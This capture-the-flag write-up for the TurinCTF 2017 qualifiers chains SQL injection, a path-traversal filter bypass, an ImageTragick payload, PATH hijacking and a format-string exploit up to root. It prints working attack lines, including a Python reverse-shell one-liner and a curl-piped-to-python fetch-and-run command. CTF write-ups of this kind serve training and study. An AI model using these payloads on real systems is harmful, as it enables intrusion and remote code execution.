TurinCTF 2017 - Quals
The Turin Cybersec Hackaton was organized by the guys at JeTOP, in collaboration with KPMG, Shielder and the PoliTO University.
This is a big Wall-of-Text.
If you were stuck in a specific point Ctrl+F -> flagN
where N is the flag you want. ;)
First Part: Log-in
We start by visiting the website quals.turinctf.it
By inspecting the page source code we can read a comment saying:
1. remove that upload file as soon as possible
2. find out why time() does not display current timestamp in seconds
Let’s try visiting upload.php
Wow, flag1 popped in an error message! T_CTF{wh393_d_f4k_4m_1?}
There wasn’t many things other than that so we need to break through the login screen located at:
This was the usual (and ugly) login screen, featuring a fancy but suspect reset password form.
By fiddling around with the forms we understood the username and password forms where not injectable.
The reset password form instead behaved in a interesting way:
if you gave it a random username it complained about not knowing it,
but if you input something like:
randomuser' or '1'='1
It answered that it had successfully sent a reset password email. It meant it was vulnerable to SQL Injection.
With BURP we intercepted and stored the HTTP POST request sent to the reset_password.php
script as request.txt
, then we ran the following command:
sqlmap -r request.txt -p username --dbms=sqlite --drop-set-cookie --regexp=".*sent.*"
The last switch in the command was necessary because the SQLi was blind as the server didn’t return any error so the only way to understand if the injection worked was the “password reset link sent” text that appeared if the expression was evaluated correctly.
Note: Sqlmap will ask if you want to follow redirection. Press Y
. After that will ask if you want to reinject into the redireted page. Press N
The command ran as expected, so we re-ran it appending a -a
switch at the end in order to dump the database. This is what came out:
| id | name | password |
| 1 | admin | 6eea9b7ef19179a06954edd0f6c05ceb (qwertyuiop) |
| 2 | flag | T_CTF{414_U_U53_5QLM49?} |
There was another flag! flag4!
Also our friend sqlmap was so kind to crack the admin hash for us.
The only problem was that if you tried to login with the admin credentials the portal wouldn’t let you in because you had to set the ?admin=nope
parameter in the URL to something different from nope.
By visiting the following url:
and using the credentials admin
you could access the portal and retrieve flag2: T_CTF{th3_c4k3_15_4_L13}
Alternatively, there is a cookie called whoami
set to 084e0343a0486ff05530df6c705c8bb4
A quick search on google tell us that it’s the md5 of guest.
You can set the whoami
cookie to md5('admin')
to login ;)
Second Part: Getting a reverse shell
Once we logged in as admin, the admin page welcomed us with 3 links:
, where you can import a file from URLview_travel_photos.php
, where you can view a file from it’s pathmake_collage.php
, where you can load.php
template file :D
So we started by trying the import one.
If we pass an URL the website print the message:
Your photo has been saved correctly to /tmp/travel_photo_" . time() . ", congrats!"
This is what the TODO was referring to!
We write-down the timestamp before the import request, import an URL and try to view it in the view page.
It works, sometimes, if you have the same time as the server.
Note: sudo ntpdate -s time.nist.gov
syncs your local time to the NIST one. ;)
Finally, we tested the behavior of make_collage, that was including php file.
We tried including ../admin.php
in reply.
No time to play around. We dumped the source code using the view page.
flag3 was in a php variable inside the index.php
file: T_CTF{c00k135_r_d311c10u5}
We found out that when including the template file, make_collage.php
was filtering the filename:
include("./templates/" . filter($_REQUEST['template']));
The filter function:
function filter($path){
if (strpos($path,"/") != false) { die("HACKING ATTEMPT"); }
$path = str_replace("../","",$path);
$path = str_replace(urldecode("%00"),"",$path);
return $path;
So, in this condition strpos($path,"/") != false
php isn’t checking the type returned by strpos
return false
if the second argument isn’t found in the first one. Otherwise returns the position of the first occurrence.
If we place a /
at the start, the position is 0
and 0 == false
so we bypass that if.
str_replace(old, new, str)
replace old
with new
in str
Every nullbyte or ../
is removed, but…
If str
is something like ....//path
, removing ../
will result in ../path
. Bingo!
Using /....//....//....//..../+path
we can load arbitrary files from the /
Note: you can also use nullbyte as a replacer /..%00/..%00/..%00/..%00+path
Import a reverse shell from URL and load it with /tmp/travel_photo_*
You know me, I don’t like doing things manually so I wrote a python script to automate this.
Third Part: From UID1000 to UID0
$ whoami
We are in.
We took a look around and find out 2 folders in /opt
- imageconverter
- copyrightreminder
Looking at the crontab:
*/5 * * * * level1 /opt/imageconverter/identify.sh
The identify.sh
script runs every 5 minutes as level1
for file in $(ls /var/www/html/uploads/)
identify /var/www/html/uploads/$file &
It’s rather simple. For every file in the uploads folder, run identify (from ImageMagik tools) on that file.
At the first time we tried pwning the $file
variable to execute multiple command by creating a file named ;program
but this wasn’t working because ls
was splitting spaces in file and also you can’t insert /
in filenames (like ;nc -e /bin/bash -lvp 8080
We returned to the identify command and noticed that imagemagik wasn’t updated since 2014. All the clues were pointing at ImageTragik.
Long story short this vulnerability allowed code execution through specially crafted images.
Knowing how the vulnerability worked we modified the following PoC:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://scusette.it/nonscrivowriteups.jpg"|cat "/etc/passwd)'
pop graphic-context
We then substituted the cat "/etc/passwd
with a common python reverse shell, put it into a exploit.mvg
file and moved it to uploads. Kids, remember +x
permission ;)
We then waited… and waited… and waited… (cronjobs exploits are always a pain in the a**)
w00t w00t, the reverse shell suddenly came up and “whoami” answered us with “level1”. Gg.
After escalating to level1 we added to the .ssh/authorized_keys
a newly generated throw-away public key and logged in via ssh.
In /home/level1/secrets/flag
we got flag5: T_CTF{y4_kn0w_kn0wn_sP100i7z_gG_br0}
Now we were in, with a decent ssh connection and a decent terminal.
We went through the usual routine of checking all the stuff that need to be checked in order to escalate privileges and a thing that immediately came to our eyes was the output of the following command:
sudo -l
which suggested we could run a file named add_copyright
with the permission of user level2
As usual we ran strings
against that binary to see if we could find something interesting in it and the following strings came out:
Now we will add the copyright to the photo!
./copyrighter photo.jpg 2>/dev/null
Copyright failed!
Mmmmh. No absolute path? That’s great! We quickly made a directory inside /tmp
named bin
and copied /bin/sh
in there, renaming it copyrighter
. After that we created a script named photo.jpg
with the following content:
Then we ran the following command sudo -u level2 /opt/copyrightreminder/add_copyright
which executed the “copyrighter” (former sh) in our folder which in turn executed photo.jpg
that gave me a shell as level2. Cool as a cucumber ;)
Note: sudoers was setting it’s secure path but didn’t excluded .
neither ~/bin
and ~/.local/bin
If you had permissions and a ./copyrighter
file in your cwd
this works flawless.
flag6: T_CTF{70_Ph0LL0W_73h_pa7h,_l00K_70_73h_mA573R,_Ph0ll0w_73H_MA573r,_wALK_W17h_73H_mA573R,_533_7Hr0u9H_73h_mA573r,_83C0M3_73h_ma573R,0r_jus7_3X3cU73_PHR0m_4N07H3R_P47H.}
Now that we are level2 we can ls into /home/level3/
-r-------- 1 level3 level3 60 Nov 14 13:52 config
-r-sr-x--- 1 level3 level2 7728 Nov 14 15:04 copyrighter
We can see that copyrighter
that has setuid
permission enabled and will be executed as level3
$ stat -c "%a %U" /home/level3/copyrighter
4550 level3
We downloaded the binary file (via scp or sftp) and decompiled with IDA
You can “easily” see that the printf(&s)
call in add_copyright
function is a vulnerable format string.
Note: I actually never exploited a format string before so I needed a fast-course on that :D
Briefly, printf
expect the format string as first parameter, like int: %d, string: %s
For each format code, printf will check for the next allocation in the stack and will print that value instead.
This way we can read values from the memory.
Using %n
you can write in the next allocation the number of bytes read in the format string until now.
Target: overwrite the exit(1)
call at the end of add_copyright
function with the address of read_config
function so the latter will be executed and it will print the config
This 3 video from LiveOverflow will help you understand. 1 2 3
With objdump -d ./copyrighter
we get the exit@plt
GOT and read_config
08048480 <exit@plt>:
8048480: ff 25 24 a0 04 08 jmp *0x804a024 <------------- exit
8048486: 68 30 00 00 00 push $0x30
804848b: e9 80 ff ff ff jmp 8048410 <_init+0x28>
080485cb <read_config>: <------------ read_config
80485cb: 55 push %ebp
80485cc: 89 e5 mov %esp,%ebp
We need to overwrite 0x804a024
with 0x80485cb
We wrote this python script that will create the exploit.
How many chars we need to write with %n
0x85cb - 32 = 34219 # lower nibble
0x10804 - 0x85cb = 33337 # higher nibble
Note: the leading one in the last difference is required since we read 0x85cb
chars from the start and 0x804
is less then that (we can’t un-read chars :D). Anyway it will overflow so no problems.
We also wrote this python script that will automatically exploit the executable.
Finally python pwn.py | ./copyrighter
revealed flag7: T_CTF{u_PhUk'D_mY_574ck,_D0_J00_Ph33L_h4Ppy?_K0Z_U_5h0ulD!}
Honorable mentions
$ cat .bash_history
echo 'miachiave' > .ssh/authorized_keys
replacing, not appending. This dropped other players keys
$ ps aux
www-data 32027 0.0 0.0 4508 700 ? S 17:58 0:00 sh -c curl https://raw.githubusercontent.com/****/tmp/master/bind1111.png | python
bind shell on port 1111 publicly accessible
$ who
level2 pts/0 2017-11-21 12:48 (ip1)
level2 pts/2 2017-11-21 11:55 (ip2)
level2 pts/3 2017-11-21 11:19 (ip3)
level2 pts/4 2017-11-21 12:15 (ip1)
level2 pts/6 2017-11-21 13:29 (ip1)
level2 pts/8 2017-11-21 12:31 (ip1)
when 1 session isn’t enougth
$ cat shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("url",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
spawning a shell without &
making php hangs and all the website unreachable